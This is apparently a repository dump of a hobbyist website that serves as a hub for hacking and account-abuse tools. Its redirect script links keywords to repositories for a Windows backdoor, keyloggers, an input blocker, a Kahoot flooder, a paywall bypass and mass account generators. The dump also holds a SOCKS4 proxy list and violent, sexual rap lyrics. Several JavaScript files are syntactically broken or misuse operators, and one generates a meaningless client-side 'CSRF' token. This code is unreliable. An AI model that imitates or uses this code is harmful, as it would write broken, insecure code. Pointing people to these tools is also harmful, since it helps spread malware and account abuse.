opkiyabbaiy8cnc8ldf0j0fi 11 | -------------------------------------------------------------------------------- /html/rap.txt: -------------------------------------------------------------------------------- 1 | Okay 2 | You already know whats up 3 | Put your glocks up 4 | Get out them XDs 5 | Put them FNs up 6 | put your shit in the air for me 7 | Fake beef what we dealin' wit 8 | That broad that you chasing, I done already done her 9 | House, trucks, big whips, baby we been did it 10 | Then reports switch name-tags - we're the enemies 11 | That's why you gotta ball every chance you get 12 | I wanna fulfill the dreams, that my granddad homes had 13 | So I spend the money to see it 14 | Not just that, the style of Knights got ya actin' wild 15 | And if you ain't got you better get 16 | cuz we aint wit that actin shit 17 | But I be on that active shit 18 | Right there on that killin shit 19 | Cuz I can't handle bitchin shit 20 | I know I ain't no pastor 21 | but this shit got me holy 22 | then I jump right out the plane 23 | with a two-tone on my ring 24 | and I got all that bling 25 | When we see them opps 26 | You know its funeral day 27 | For them boys with different colors 28 | Its like death day everyday 29 | shoot you up aint time to wait 30 | get my bitch to clean my plate 31 | You know gang gonna stay out late 32 | Fuck that pussy get on knees 33 | Charlie brown the way I ease 34 | throw that football not time to wheeze 35 | Can't see me giving no fake my cheese 36 | Rap to the fullest, finna go hard 37 | Cause and effect, smell the smoke and the breeze 38 | -------------------------------------------------------------------------------- /html/socks4.txt: -------------------------------------------------------------------------------- 1 | 109.127.82.115:5678 2 | 50.207.130.238:54321 3 | 103.241.227.100:6667 4 | 91.207.238.107:45627 5 | -------------------------------------------------------------------------------- /img/Altify.ico: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Altify-Developing/Altify-Developing-Main/36992a51831283e4de13dd4e479ba088702eabed/img/Altify.ico -------------------------------------------------------------------------------- /img/Asset 860.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Altify-Developing/Altify-Developing-Main/36992a51831283e4de13dd4e479ba088702eabed/img/Asset 860.png -------------------------------------------------------------------------------- /img/Asset 870.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Altify-Developing/Altify-Developing-Main/36992a51831283e4de13dd4e479ba088702eabed/img/Asset 870.png -------------------------------------------------------------------------------- /img/Pastebin.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Altify-Developing/Altify-Developing-Main/36992a51831283e4de13dd4e479ba088702eabed/img/Pastebin.gif -------------------------------------------------------------------------------- /img/StatsGenQR.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Altify-Developing/Altify-Developing-Main/36992a51831283e4de13dd4e479ba088702eabed/img/StatsGenQR.png -------------------------------------------------------------------------------- /img/charts.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Altify-Developing/Altify-Developing-Main/36992a51831283e4de13dd4e479ba088702eabed/img/charts.png -------------------------------------------------------------------------------- /img/config.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Altify-Developing/Altify-Developing-Main/36992a51831283e4de13dd4e479ba088702eabed/img/config.png -------------------------------------------------------------------------------- /img/email-campaign.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Altify-Developing/Altify-Developing-Main/36992a51831283e4de13dd4e479ba088702eabed/img/email-campaign.png -------------------------------------------------------------------------------- /img/favicon-0.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Altify-Developing/Altify-Developing-Main/36992a51831283e4de13dd4e479ba088702eabed/img/favicon-0.png -------------------------------------------------------------------------------- /img/footer-background.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Altify-Developing/Altify-Developing-Main/36992a51831283e4de13dd4e479ba088702eabed/img/footer-background.png -------------------------------------------------------------------------------- /img/fpc.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Altify-Developing/Altify-Developing-Main/36992a51831283e4de13dd4e479ba088702eabed/img/fpc.gif -------------------------------------------------------------------------------- /img/frame.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Altify-Developing/Altify-Developing-Main/36992a51831283e4de13dd4e479ba088702eabed/img/frame.png -------------------------------------------------------------------------------- /img/githuberror-52422.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Altify-Developing/Altify-Developing-Main/36992a51831283e4de13dd4e479ba088702eabed/img/githuberror-52422.png -------------------------------------------------------------------------------- /img/graphic.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Altify-Developing/Altify-Developing-Main/36992a51831283e4de13dd4e479ba088702eabed/img/graphic.png -------------------------------------------------------------------------------- /img/graphs.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Altify-Developing/Altify-Developing-Main/36992a51831283e4de13dd4e479ba088702eabed/img/graphs.png -------------------------------------------------------------------------------- /img/logo-main.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Altify-Developing/Altify-Developing-Main/36992a51831283e4de13dd4e479ba088702eabed/img/logo-main.png -------------------------------------------------------------------------------- /img/logo-sub-1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Altify-Developing/Altify-Developing-Main/36992a51831283e4de13dd4e479ba088702eabed/img/logo-sub-1.png -------------------------------------------------------------------------------- /img/logo-sub-2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Altify-Developing/Altify-Developing-Main/36992a51831283e4de13dd4e479ba088702eabed/img/logo-sub-2.png -------------------------------------------------------------------------------- /img/logo-sub-3.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Altify-Developing/Altify-Developing-Main/36992a51831283e4de13dd4e479ba088702eabed/img/logo-sub-3.png -------------------------------------------------------------------------------- /img/logo-sub-4.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Altify-Developing/Altify-Developing-Main/36992a51831283e4de13dd4e479ba088702eabed/img/logo-sub-4.png -------------------------------------------------------------------------------- /img/online-campaign.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Altify-Developing/Altify-Developing-Main/36992a51831283e4de13dd4e479ba088702eabed/img/online-campaign.png -------------------------------------------------------------------------------- /img/process.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Altify-Developing/Altify-Developing-Main/36992a51831283e4de13dd4e479ba088702eabed/img/process.png -------------------------------------------------------------------------------- /img/social.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Altify-Developing/Altify-Developing-Main/36992a51831283e4de13dd4e479ba088702eabed/img/social.png -------------------------------------------------------------------------------- /img/standard.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Altify-Developing/Altify-Developing-Main/36992a51831283e4de13dd4e479ba088702eabed/img/standard.gif -------------------------------------------------------------------------------- /img/team1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Altify-Developing/Altify-Developing-Main/36992a51831283e4de13dd4e479ba088702eabed/img/team1.png -------------------------------------------------------------------------------- /img/team2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Altify-Developing/Altify-Developing-Main/36992a51831283e4de13dd4e479ba088702eabed/img/team2.png -------------------------------------------------------------------------------- /img/team3.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Altify-Developing/Altify-Developing-Main/36992a51831283e4de13dd4e479ba088702eabed/img/team3.png -------------------------------------------------------------------------------- /js/counter.js: -------------------------------------------------------------------------------- 1 | var counterContainer = document.querySelector(".website-counter"); 2 | var milestoneContainer = document.querySelector(".milestone-counter"); 3 | var visitCount = localStorage.getItem("page_view"); 4 | 5 | // Check if page_view entry is present 6 | if (visitCount) { 7 | visitCount = Number(visitCount) + 1; 8 | localStorage.setItem("page_view", visitCount); 9 | if (visitCount == 150) alert("Welcome 150th Visitor"); 10 | if (visitCount == 175) alert("Welcome 175th Visitor"); 11 | if (visitCount == 200) alert("Welcome 200th Visitor"); 12 | if (visitCount == 215) alert("Welcome 215th Visitor"); 13 | if (visitCount == 230) alert("Welcome 230th Visitor"); 14 | if (visitCount == 245) alert("Welcome 245th Visitor"); 15 | if (visitCount == 250) alert("Welcome 250th Visitor"); 16 | if (visitCount == 275) alert("Welcome 275th Visitor"); 17 | if (visitCount == 300) alert("Welcome 300th Visitor"); 18 | if (visitCount == 315) alert("Welcome 315th Visitor"); 19 | if (visitCount == 330) alert("Welcome 330th Visitor"); 20 | if (visitCount == 345) alert("Welcome 345th Visitor"); 21 | if (visitCount == 360) alert("Welcome 360th Visitor"); 22 | if (visitCount == 375) alert("Welcome 375th Visitor"); 23 | if (visitCount == 400) alert("Welcome 400th Visitor"); 24 | if (visitCount == 415) alert("Welcome 415th Visitor"); 25 | if (visitCount == 430) alert("Welcome 430th Visitor"); 26 | if (visitCount == 445) alert("Welcome 445th Visitor"); 27 | if (visitCount == 450) alert("Welcome 450th Visitor"); 28 | if (visitCount == 475) alert("Welcome 475th Visitor"); 29 | if (visitCount == 500) alert("Welcome 500th Visitor"); 30 | const rndInt = Math.floor(Math.random() * 10) + 1 31 | document.cookie = 'VisitorCount='+visitCount+'; expires=Wed, 1 Jan 2070 13:47:11 UTC; path=/'; 32 | } else { 33 | visitCount = 1; 34 | localStorage.setItem("page_view", 1); 35 | } 36 | counterContainer.innerHTML = visitCount; 37 | -------------------------------------------------------------------------------- /js/csrf.js: -------------------------------------------------------------------------------- 1 | setTimeout(randomString, 200); 2 | function randomString(length, chars) { 3 | refcount = Math.floor(Math.random() * 100000) + 1; 4 | var result = ''; 5 | for (var i = length; i > 0; --i) result += chars[Math.floor(Math.random() * chars.length)]; 6 | return result; 7 | } 8 | csrf = randomString(32, '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ'); 9 | document.getElementById("csrfid").innerHTML = (csrf); 10 | -------------------------------------------------------------------------------- /js/read.plugin.js: -------------------------------------------------------------------------------- 1 | function replace() { 2 | document.getElementById("goto").innerHTML = new; 3 | var origin = window.location.href 4 | let origal = location.origin; 5 | window.location.replace(origal+"/?"+new); 6 | } 7 | -------------------------------------------------------------------------------- /js/redirect.js: -------------------------------------------------------------------------------- 1 | function getAllUrlParams(url) { 2 | var queryString = url ? url.split('?')[1] : window.location.search.slice(1); 3 | var obj = {}; 4 | 5 | if (queryString) { 6 | queryString = queryString.split('#')[0]; 7 | var arr = queryString.split('&'); 8 | 9 | for (var i = 0; i < arr.length; i++) { 10 | var a = arr[i].split('='); 11 | var paramName = a[0]; 12 | var paramValue = typeof (a[1]) === 'undefined' ? true : a[1]; 13 | 14 | paramName = paramName.toLowerCase(); 15 | if (typeof paramValue === 'string') paramValue = paramValue.toLowerCase(); 16 | 17 | if (paramName.match(/\[(\d+)?\]$/)) { 18 | var key = paramName.replace(/\[(\d+)?\]/, ''); 19 | if (!obj[key]) obj[key] = []; 20 | 21 | if (paramName.match(/\[\d+\]$/)) { 22 | var index = /\[(\d+)\]/.exec(paramName)[1]; 23 | obj[key][index] = paramValue; 24 | } else { 25 | obj[key].push(paramValue); 26 | } 27 | } else { 28 | if (!obj[paramName]) { 29 | obj[paramName] = paramValue; 30 | } else if (obj[paramName] && typeof obj[paramName] === 'string'){ 31 | obj[paramName] = [obj[paramName]]; 32 | obj[paramName].push(paramValue); 33 | } else { 34 | obj[paramName].push(paramValue); 35 | } 36 | } 37 | } 38 | } 39 | 40 | return obj; 41 | } 42 | var origin = window.location.href 43 | let origal = location.origin; 44 | let redr = getAllUrlParams(origin).destination 45 | if (redr == 'tos') { 46 | window.location.replace(origal+'/html/ToS'); 47 | } else if (redr == 'github') { 48 | window.location.replace('https://github.com/Altify-Developing/Altify-Developing-Main'); 49 | } else (redr == 'tools') { 50 | window.location.replace(origal+'/html/toolstodownload'); 51 | } 52 | -------------------------------------------------------------------------------- /js/urlcheck.js: -------------------------------------------------------------------------------- 1 | $(document).ready(function() { 2 | let origin = location.origin; 3 | if (window.location.href.indexOf("current") > -1) { 4 | window.location.replace(origin+"/currentcount"); 5 | } 6 | if (window.location.href.indexOf("keylogger2") > -1) { 7 | window.location.replace("https://ip-tracing.netlify.app/"); 8 | } 9 | if (window.location.href.indexOf("keylogger") > -1) { 10 | window.location.replace(origin+"/html/ResponsiveKeyLogger/info"); 11 | } 12 | if (window.location.href.indexOf("calculator") > -1) { 13 | window.location.replace(origin+"/html/new_tools/trig_calc/calculator"); 14 | } 15 | if (window.location.href.indexOf("oldproxy" || "oldgen") > -1) { 16 | window.location.replace(origin+"/html/NEW_TOOLS/ProxyGen"); 17 | } 18 | if (window.location.href.indexOf("new" || "latest") > -1) { 19 | window.location.replace("https://github.com/Altify-Development/Fake-Person-Generator"); 20 | } 21 | if (window.location.href.indexOf(("fakeperson") || ("fakegen")) > -1) { 22 | window.location.replace("https://github.com/Altify-Development/Fake-Person-Generator"); 23 | } 24 | if (window.location.href.indexOf(("person") || ("fpg")) > -1) { 25 | window.location.replace("https://github.com/Altify-Development/Fake-Person-Generator"); 26 | } 27 | if (window.location.href.indexOf(("combo") || ("cleaner")) > -1) { 28 | window.location.replace("https://github.com/Altify-Development/combocleaner-custom"); 29 | } 30 | if (window.location.href.indexOf(("list") || ("altifycleaner")) > -1) { 31 | window.location.replace("https://github.com/Altify-Development/combocleaner-custom"); 32 | } 33 | if (window.location.href.indexOf(("gmail") || ("generator")) > -1) { 34 | window.location.replace("https://github.com/Altify-Development/Gmail-Generator-Python"); 35 | } 36 | if (window.location.href.indexOf("pythongmail") > -1) { 37 | window.location.replace("https://github.com/Altify-Development/Gmail-Generator-Python"); 38 | } 39 | if (window.location.href.indexOf(("discord") || ("join")) > -1) { 40 | window.location.replace("https://discord.altifydeveloping.com/"); 41 | } 42 | if (window.location.href.indexOf(("help") || ("faq")) > -1) { 43 | window.location.replace("https://discord.altifydeveloping.com/"); 44 | } 45 | if (window.location.href.indexOf(("input") || ("blocker")) > -1) { 46 | window.location.replace("https://github.com/Altify-Development/Keyboard-and-mouse-Input-Blocker"); 47 | } 48 | if (window.location.href.indexOf(("keyblock") || ("keystopper")) > -1) { 49 | window.location.replace("https://github.com/Altify-Development/Keyboard-and-mouse-Input-Blocker"); 50 | } 51 | if (window.location.href.indexOf(("spotify") || ("spoty")) > -1) { 52 | window.location.replace("https://github.com/Altify-Development/Premium-Spotify-Account-Generator-Python-2022"); 53 | } 54 | if (window.location.href.indexOf("krnl") > -1) { 55 | window.location.replace("https://github.com/Altify-Development/krnl-linkvertise-bypass"); 56 | } 57 | if (window.location.href.indexOf(("backdoor") || ("rat")) > -1) { 58 | window.location.replace("https://github.com/Altify-Development/windows-backdoor"); 59 | } 60 | if (window.location.href.indexOf("val") > -1) { 61 | window.location.replace("https://github.com/Altify-Development/Valorant-Account-Generator-Python-2022"); 62 | } 63 | if (window.location.href.indexOf("nike") > -1) { 64 | window.location.replace("https://github.com/Altify-Development/Nike-Account-Generator-Python-2022"); 65 | } 66 | if (window.location.href.indexOf(("steam") || ("sac")) > -1) { 67 | window.location.replace("https://github.com/Altify-Development/Steam-Account-Generator-Python-2022"); 68 | } 69 | if (window.location.href.indexOf("google") > -1) { 70 | window.location.replace("https://github.com/Altify-Development/Google-Account-Generator-Python"); 71 | } 72 | if (window.location.href.indexOf("anticlose") > -1) { 73 | window.location.replace("https://github.com/Altify-Development/Anti-Close-Keylogger-AutoHotKey"); 74 | } 75 | if (window.location.href.indexOf("main") > -1) { 76 | window.location.replace("https://github.com/Altify-Developing/Altify-Developing-Main"); 77 | } 78 | if (window.location.href.indexOf(("youtube") || ("money")) > -1) { 79 | window.location.replace("https://youtubemoney.netlify.app/"); 80 | } 81 | if (window.location.href.indexOf(("flooder") || ("kahoot")) > -1) { 82 | window.location.replace("https://github.com/Altify-Developing/kahoot-flooder"); 83 | } 84 | if (window.location.href.indexOf(("ip") || ("trace")) > -1) { 85 | window.location.replace("https://github.com/Altify-Developing/IP-TRACE-INDEPTH"); 86 | } 87 | if (window.location.href.indexOf(("oag") || ("online+account+generator")) > -1) { 88 | window.location.replace(origin+"/html/oag/oag"); 89 | } 90 | if (window.location.href.indexOf(("csrf") || ("cross")) > -1) { 91 | window.location.replace(origin+"/csrf/x-csrf-gen"); 92 | } 93 | if (window.location.href.indexOf(("c#") || ("csharp")) > -1) { 94 | window.location.replace(origin+"/html/CSharpToolsOnly"); 95 | } 96 | if (window.location.href.indexOf(("proxy") || ("triple")) > -1) { 97 | window.location.replace(origin+"/html/ajax/info"); 98 | } 99 | if (window.location.href.indexOf(("socks") || ("pg")) > -1) { 100 | window.location.replace(origin+"/html/ajax/info"); 101 | } 102 | if (window.location.href.indexOf("httpprox") > -1) { 103 | window.location.replace(origin+"/html/ajax/http"); 104 | } 105 | if (window.location.href.indexOf("s4") > -1) { 106 | window.location.replace(origin+"/html/ajax/socks4"); 107 | } 108 | if (window.location.href.indexOf("s5") > -1) { 109 | window.location.replace(origin+"/html/ajax/socks5"); 110 | } 111 | if (window.location.href.indexOf(("w10") || ("keys")) > -1) { 112 | window.location.replace(origin+"/html/new_tools/w10/generator"); 113 | } 114 | if (window.location.href.indexOf(("flow") || ("heat")) > -1) { 115 | window.location.replace(origin+"/html/new_tools/calculators/heat_flow/calculate"); 116 | } 117 | if (window.location.href.indexOf(("encoder") || ("encrypt")) > -1) { 118 | window.location.replace("https://replit.com/@Altify-Developm/Multi-encoder?v=1"); 119 | } 120 | if (window.location.href.indexOf("blog") > -1) { 121 | window.location.replace("https://blogging-service-template.altify-developm.repl.co/"); 122 | } 123 | if (window.location.href.indexOf(("file") || ("storage")) > -1) { 124 | window.location.replace("https://storage.altifydeveloping.com"); 125 | } 126 | if (window.location.href.indexOf(("wheel") || ("names")) > -1) { 127 | window.location.replace("https://wheel.altifydeveloping.com"); 128 | } 129 | if (window.location.href.indexOf(("blocked") || ("goguardian")) > -1) { 130 | window.location.replace("https://Fake-GoGuardian-Blocked-Page.altify-developm.repl.co"); 131 | } 132 | if (window.location.href.indexOf(("game") || ("chicken")) > -1) { 133 | window.location.replace("https://Ballistic-Chickens-but-everything-is-much-cheaper.altify-developm.repl.co"); 134 | } 135 | if (window.location.href.indexOf(("shortener") || ("url")) > -1) { 136 | window.location.replace("https://URL-Shortener.altify-developm.repl.co"); 137 | } 138 | if (window.location.href.indexOf("pseudocpp") > -1) { 139 | window.location.replace("https://github.com/Altify-Development/pseudo-account-generator"); 140 | } 141 | }); 142 | -------------------------------------------------------------------------------- /netlify/functions/netlify.toml: -------------------------------------------------------------------------------- 1 | # Production context: 2 | # All deploys from the main repository branch 3 | # will inherit these settings. Be mindful 4 | # when using this option and avoid committing 5 | # sensitive values to public source repositories. 6 | [context.production] 7 | command = "make production" 8 | # Deploys from main branch run this plugin in the build. 9 | # Plugins context requires double brackets. 10 | [[context.production.plugins]] 11 | package = "@netlify/plugin-sitemap" 12 | 13 | # Deploy Preview context: 14 | # All deploys generated from a pull/merge request 15 | # will inherit these settings. Be mindful 16 | # when using this option and avoid committing 17 | # sensitive values to public source repositories. 18 | 19 | # Branch deploy context: 20 | # All deploys that are not from a pull/merge request 21 | # or from the production branch will inherit these settings. 22 | [context.branch-deploy] 23 | command = "make staging" 24 | 25 | # Dev context: 26 | # Environment variables set here are available for local 27 | # development environments run using Netlify Dev. These 28 | # values can be overwritten on branches that have a more 29 | # specific branch context configured. 30 | [context.dev.environment] 31 | NODE_ENV = "development" 32 | 33 | # Specific branch context: 34 | # Deploys from this branch will take these settings 35 | # and override their current ones. 36 | [context.feature] 37 | command = "make feature" 38 | 39 | [context."features/branch"] 40 | command = "docs" 41 | -------------------------------------------------------------------------------- /robots.txt: -------------------------------------------------------------------------------- 1 | User-agent: Googlebot 2 | Disallow: 3 | User-agent: googlebot-image 4 | Disallow: 5 | User-agent: googlebot-mobile 6 | Disallow: 7 | User-agent: MSNBot 8 | Disallow: 9 | User-agent: Slurp 10 | Disallow: 11 | User-agent: Teoma 12 | Disallow: 13 | User-agent: Gigabot 14 | Disallow: 15 | User-agent: Robozilla 16 | Disallow: 17 | User-agent: Nutch 18 | Disallow: 19 | User-agent: ia_archiver 20 | Disallow: 21 | User-agent: baiduspider 22 | Disallow: 23 | User-agent: naverbot 24 | Disallow: 25 | User-agent: Bingbot 26 | Disallow: 27 | User-agent: yeti 28 | Disallow: 29 | User-agent: yahoo-mmcrawler 30 | Disallow: 31 | User-agent: psbot 32 | Disallow: 33 | User-agent: yahoo-blogs/v3.9 34 | Disallow: 35 | User-agent: * 36 | Disallow: 37 | Sitemap: https://www.altifydeveloping.com/sitemap.xml 38 | -------------------------------------------------------------------------------- /sign-in.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 15 | Log In 16 |
25 |
33 | 34 | 35 | 36 | 37 | 38 |
39 | 40 | 43 |
44 | 45 | 46 | --------------------------------------------------------------------------------